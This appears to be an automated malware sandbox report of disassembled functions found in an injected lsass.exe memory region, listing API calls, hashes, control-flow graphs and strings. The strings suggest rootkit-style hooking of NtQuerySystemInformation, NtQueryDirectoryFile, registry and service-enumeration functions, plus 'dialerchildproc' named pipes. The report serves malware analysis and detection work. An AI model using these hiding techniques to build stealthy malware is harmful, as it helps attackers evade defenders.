                                                              • Instruction Fuzzy Hash: 8DE0ED76611704C6FB089B62D84C25E76A5FB88B16F458126CB0907322DF3A8499C614

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 435a5f88e7c6a6dd218e0f6004eb37f2790bd4aa4d5b291e1e8191fef771e2ad
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: A8119672618782D2F760D721F8CDB6D2294BB54748F528127ABB6497A3EF78C46C8240

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                                • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                              • Sleep.KERNEL32 ref: 00000202C0AE1AD7
                                                              • SleepEx.KERNELBASE ref: 00000202C0AE1ADD
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                                • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                                • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 1519724245a59a03f973eddcebe70884a6cccd966baeab2eab41fd8751cf1259
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: ED31C071200BE1C1FF509B26DACD3AD53A5AB84FC4F0654239FA987697FE14C879C210

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 228 202c0ab273c-202c0ab27a4 call 202c0ab29d4 * 4 237 202c0ab27aa-202c0ab27ad 228->237 238 202c0ab29b2 228->238 237->238 240 202c0ab27b3-202c0ab27b6 237->240 239 202c0ab29b4-202c0ab29d0 238->239 240->238 241 202c0ab27bc-202c0ab27bf 240->241 241->238 242 202c0ab27c5-202c0ab27e6 241->242 242->238 244 202c0ab27ec-202c0ab280c 242->244 245 202c0ab280e-202c0ab2836 244->245 246 202c0ab2838-202c0ab283f 244->246 245->245 245->246 247 202c0ab28df-202c0ab28e6 246->247 248 202c0ab2845-202c0ab2852 246->248 250 202c0ab28ec-202c0ab2901 247->250 251 202c0ab2992-202c0ab29b0 247->251 248->247 249 202c0ab2858-202c0ab286a LoadLibraryA 248->249 252 202c0ab286c-202c0ab2878 249->252 253 202c0ab28ca-202c0ab28d2 249->253 250->251 254 202c0ab2907 250->254 251->239 255 202c0ab28c5-202c0ab28c8 252->255 253->249 256 202c0ab28d4-202c0ab28d9 253->256 258 202c0ab290d-202c0ab2921 254->258 255->253 261 202c0ab287a-202c0ab287d 255->261 256->247 259 202c0ab2923-202c0ab2934 258->259 260 202c0ab2982-202c0ab298c 258->260 262 202c0ab293f-202c0ab2943 259->262 263 202c0ab2936-202c0ab293d 259->263 260->251 260->258 264 202c0ab287f-202c0ab28a5 261->264 265 202c0ab28a7-202c0ab28b7 261->265 268 202c0ab294d-202c0ab2951 262->268 269 202c0ab2945-202c0ab294b 262->269 267 202c0ab2970-202c0ab2980 263->267 270 202c0ab28ba-202c0ab28c1 264->270 265->270 267->259 267->260 271 202c0ab2963-202c0ab2967 268->271 272 202c0ab2953-202c0ab2961 268->272 269->267 270->255 271->267 274 202c0ab2969-202c0ab296c 271->274 272->267 274->267
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: e9c472418be9705004432d1361e805bb540b7ad58247b10c253449de9ed0d722
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: 8161DF72B01790C7EB648F15908C76DB3A2FB54BA4F598127DF5D0778ADA38D86AC700

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction ID: f1c622e14429a0b520057bbb946f3f429c66e82a7f768f9b6ab0a37ff79ad3e0
                                                              • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction Fuzzy Hash: E4F0E998311780C1FE546B6699CD39D22845F88BC0F0E5437CF9A867D3EE1CC4AC8620

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 629c2a77cc7c689ebc2a82fae016c29b45818ce3604cad8590d8ad8b42d26791
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 8BB18B62210BA0C6FB688F25C8CC7AD67A5F744B88F565017EF9953796EB35CC68C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 43f65ee015122b04127526cc5c334c21e5a52d8fe7862f76cef395083f707644
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 74311972205B80CAFB609F60E8887ED6364F784744F45442BDB8E57A9AEF39C658C710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 3629953f5db9c1b5f8070e01c3cc1c8c2a667b2e639c3edd282c0df2f16cc2f9
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: FF314F36214B80C6EB60CF25E88879E73A4F789758F550127EB9D47BA6EF38C559CB00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: a5c0dd0dd48098ab404cbb16107d584fe92d72ef17c22032ec6d5acc94b81fb7
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 2C513876200B84C6EB50CF62E48C35EB7A5F788F89F458126DB890776ADF39C059CB00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 90a0736ddaf8fe37476ff4478ca91d660d6ffa8bbfea73cfc67e31501e438409
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 5031A2A5100B8AE0FE15EF69E8DD7DC2321F704748F835423D7A9021679F79866ED391

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 14de66892ba18830acab2e245ab1e6cb8a15d62160b2822f01b591de40b948de
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 1381EE31600701CAFB50AB66A4CD39D66E8EB85780F57842BAB48977B7DF3DC88D8700

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000202C0AECE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEBC
                                                              • SetLastError.KERNEL32 ref: 00000202C0AECED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEECCC,?,?,?,?,00000202C0AEBF9F,?,?,?,?,?,00000202C0AE7AB0), ref: 00000202C0AECF2C
                                                                • Part of subcall function 00000202C0AED6CC: HeapAlloc.KERNEL32 ref: 00000202C0AED721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF54
                                                                • Part of subcall function 00000202C0AED744: HeapFree.KERNEL32 ref: 00000202C0AED75A
                                                                • Part of subcall function 00000202C0AED744: GetLastError.KERNEL32 ref: 00000202C0AED764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF76
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 4882f9c6545ddba956175daa0b1033055c58a1b9921f799def37e079ec50fdf9
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 754197603013C4D6FE68A73555DD36D2242AB44BB4F174B27ABBB077E7EE38886A4600

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: a0d3f3940cedbe8f49a02ff4fcf1ce97ef5dd93de91068aee362f87148ae0ba9
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 31213832614B40C2FB208B25E48C75E67A5F789BA4F514217EB9A03BA9CF3DC54DCB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: dc69ca82dc18b6d9c62c9d97f6a4348578a3add946f7b447ab90ca90604d3949
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: 12E16A72600B80CAFB60DB65948C39D77A4F7A6B98F120117EFA957B97CB34D4A9C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 181cfaa8d1e203509729981359315e3b225e44fdda2c096569e0a7ba0a0bf46d
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: E5E17A72604B80CAFB60DB69D48839D7BA4F755B98F12011BEF8957B9ACB34C499C704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 26dcd2d441800ec49dab0db58e17c16847a3beddbc1f683c45a4dffa8db80317
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 2A41F422311B90D1FA16CB56A88C75E2395F748BA0F0A45279F6E877D6EE3DC45D8300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: a80658ec44f4b8303e4c6cbc6e08df687ba0206d03e3ba62d1abb9220ce3f758
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: B6415E73214B84C6F760CF21E48879E77A5F388B98F45822ADB8907B59DF39C599CB40
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 363b9827668d8b761d31e44ad5a3e4dbf29d2bfe1cda884ffc1cc8260375dec9
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: D111AB607043C4C6FE68973555DD37D6141AB447F4F1A4727EAFA077DBDE28C86A8600
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 14979f1a24b322753f854ca5a4dead1d4ee237c3b69154d6c2c35d4c8e247c5d
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CE81F4617007C1C6FB54AB65A8CD39D2390BB85B84F174427EBE9477A7EB38CA6D8700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 93692ba9be4b391852265e8ab40df330be3080cd4f0ad2a801a0759650363b03
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: A731A722212B80D1FE15DB42A48C75D2294B748BA0F5B49279FBE07792DF39C5AD8304
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: b26ab6e85d4882431b05eb7ffbdc71b03f0f6e90507cbc4b46897213533c190b
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 91116D22314B40C6F7508B52E89C71D77A4F788FE8F154227EA5E877A6CF39C8188744
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: bcb637cd16c44afa16a89db43d108bf5c410f3b34640b7b1e1fa2b494dd30d53
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: E1115726304B81C2FB149B21E48C26D72B4FB88B85F06412BDF99037AAEF3EC509C704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: dbc3b65819fd6533e59164d32a3bb8f97f2c88b353aa9b524f2c9543e34d3ae7
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: 30D18776205B88C6EA70DB1AE49835E77A0F388B88F110517EADE47BA6DF3CC555CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
